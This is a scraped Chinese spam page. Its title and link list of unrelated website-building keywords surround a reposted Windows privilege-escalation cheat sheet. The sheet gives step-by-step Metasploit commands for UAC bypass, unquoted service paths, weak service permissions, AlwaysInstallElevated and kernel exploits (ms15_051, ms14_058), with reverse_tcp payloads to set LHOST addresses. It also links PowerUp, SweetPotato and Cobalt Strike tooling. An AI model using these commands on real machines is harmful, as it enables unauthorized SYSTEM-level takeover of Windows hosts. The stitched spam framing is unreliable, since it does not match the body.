当前位置: 首页 > news >正文

哪些女性网站做女性慈善事业本地免费发布信息网站

news 2025/7/28 8:04:10
哪些女性网站做女性慈善事业,本地免费发布信息网站,品牌网站建站,免费表格模板网站Metasploit自动提权 Meterpreter自动提权命令 getsystem: getsystem是由Metasploit-Framework提供的一个模块,它可以将一个管理帐户(通常为本地Administrator账户)提升为本地SYSTEM帐户 1)getsystem创建一个新的Windows服务&…

Metasploit自动提权

Meterpreter自动提权命令

getsystem:
getsystem是由Metasploit-Framework提供的一个模块,它可以将一个管理帐户(通常为本地Administrator账户)提升为本地SYSTEM帐户
1)getsystem创建一个新的Windows服务,设置为SYSTEM运行,当它启动时连接到一个命名管道。
2)getsystem产生一个进程,它创建一个命名管道并等待来自该服务的连接。
3)Windows服务已启动,导致与命名管道建立连接。
4)该进程接收连接并调用ImpersonateNamedPipeClient,从而为SYSTEM用户创建模拟令牌。
5)然后用新收集的SYSTEM模拟令牌产生cmd.exe,并且我们有一个SYSTEM特权进程。

bypassUAC

UAC:用户帐户控制(User Account Control),是windows操作系统中采用的一种控制机制,它以预见的
方式阻止不必要的系统范围更改
getsystem提权方式对于普通用户来说是失败的不可正常执行的,那么这种情况下就需要绕过系统UAC来进行
getsystem提权

进程注入

use exploit/windows/local/bypassuac
set payload windows/meterpreter/reverse_tcp
set LHOST=192.168.40.151
set session 1
exploit

内存注入

use exploit/windows/local/bypassuac_injection
set payload windows/meterpreter/reverse_tcp
set LHOST=192.168.1.170
set session 1
exploit

Eventvwr注册表项

use exploit/windows/local/bypassuac_eventvwr

COM处理程序劫持

use exploit/windows/local/bypassuac_comhijack 通过bypassUAC获取的session可以看到依然是普通权限,可以getsystem进行提权至system权限

kernel漏洞提权

windows-kernel-exploits(Windows平台提权漏洞集合):
https://github.com/SecWiki/windows-kernel-exploits
use post/multi/recon/local_exploit_suggester
set SESSION 1
exploit
优点:省去手动查找的麻烦
缺点:不是所有列出的local exploit都可用

unquoted_service_path

unquoted_service_path 模块
已弃用exploits/windows/local/trusted_service_path
exploit/windows/local/unquoted_service_path
set session 1
Exploit -j
use exploit/multi/handler
set autorunscript migrate –f
Exploit -j

service_permissions

service_permissions模块
use exploit/windows/local/service_permissions
set sessions 1
run

always_install_elevated

always_install_elevated模块
use exploit/windows/local/always_install_elevated
set sessions 1
run

Kernel privilege escalation

Windows ClientCopyImage Win32k Exploit
适用与win7 win server 2008R2SP1 x64
use exploit/windows/local/ms15_051_client_copy_image
set lhost xx.xx.xx.xx
set session 1
exploit

ms14_058提权

use exploit/windows/local/ms14_058_track_popup_menu
set lhost xx.xx.xx.xx
set session 1
exploit
https://www.freebuf.com/articles/system/184289.html

Cobaltstrike自动提权

CobaltStrike提权模块
beacon - Elevate
自用提权exe(自己弄来cve运行)
Powershell
下载链接
https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1
https://github.com/PowerShellMafia/PowerSploit/
help powershell-import
Use: powershell-import [/path/to/local/script.ps1]
SweetPotato
https://github.com/Tycx2ry/SweetPotato_CS
http://www.dinnco.com/news/82734.html

相关文章:

  • 做cpa建什么网站教育培训机构有哪些
  • 网站网站怎么定位国家免费职业技能培训
  • 中山市政府网站建设北京seo公司网站
  • 网站开发做什么的国际最新新闻热点事件
  • 重启服务器 wordpressseo查询工具
  • 服装网站banner怎么做app开发者需要更新此app
  • 网站制作首选 新鸿儒现在疫情怎么样了最新消息
  • 著名建站公司自己做网站的软件
  • 北京 科技网站建设免费发广告的网站
  • 旅游网站的建设依据和背景美国疫情最新消息
  • 做五金建材市场的网站重庆森林经典台词梁朝伟
  • 台州建设局招标投标网站今日重大新闻头条十条
  • 厦门建设执业资格注册管理中心网站关键词的优化方法
  • 网站源码安装教程国内免费发布产品的平台
  • 南昌网站建设多少钱最新新闻消息
  • wordpress培训插件江苏网站seo
  • 新手建网站什么类型好全网搜索关键词查询
  • 常州网站建设智博网络营销这个专业怎么样
  • css div旅游j景区网站模板百度指数工具
  • 宝山网页设计制作seo实战技术培训
  • 郓城做网站公司永久免费google搜索引擎
  • 深圳房地产网站设计百度关键词优化首选667seo
  • 咖啡网站模板最近的国内新闻
  • 做网站收入怎么样网络营销知识点
  • 帝国网站制作广告新手学seo
  • 网站地图怎么做学网络营销有用吗
  • 如何评判一个网站建设的怎么样安卓优化大师历史版本
  • 台州网站建设技术外包域名地址查询
  • 地图素材如何做ppt模板下载网站免费发布信息网网站
  • 南京工程建设招聘信息网站谷歌搜索引擎入口2022